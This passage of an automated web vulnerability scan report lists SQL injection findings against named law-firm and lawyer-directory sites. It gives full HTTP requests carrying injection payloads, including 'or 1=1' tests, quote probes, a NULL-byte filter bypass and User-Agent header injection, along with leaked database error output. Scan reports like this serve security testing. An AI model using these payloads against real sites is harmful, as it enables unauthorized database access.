<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20011542'%20or%201%3d1--%20 and 20011542'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts20011542'%20or%201%3d1--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts20011542'%20or%201%3d2--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14454098'%20or%201%3d1--%20 and 14454098'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/menu.css14454098'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/menu.css14454098'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CaseID parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cases.html?action=caseDetail&CaseID=102%27%00' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23300
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 2: Incorrect syntax near ''.</td>
...[SNIP]...

Request 2

GET /cases.html?action=caseDetail&CaseID=102%27%00'' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23363
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...

1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The PracticeAreaID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the PracticeAreaID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.2.10.1305219554; __utmc=182215078

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23102
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '3' <br />
...[SNIP]...

1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:02 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 491

insert lawyer profile view tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://layserfreiwald.com/attorneys.html?mode=view&AID=8')' at line 1:: INSERT INTO lawyer_profile_vie
...[SNIP]...

Request 2

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /redir

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:37 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=fdc7e2e2ab89726f93f17512e759fb1e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 647

insert click tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '150_badge','8480c83d-644a-4fd5-9e3b-15644c36fe5e','http://layserfreiwald.com/att' at line 1:: INSERT I
...[SNIP]...

Request 2

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
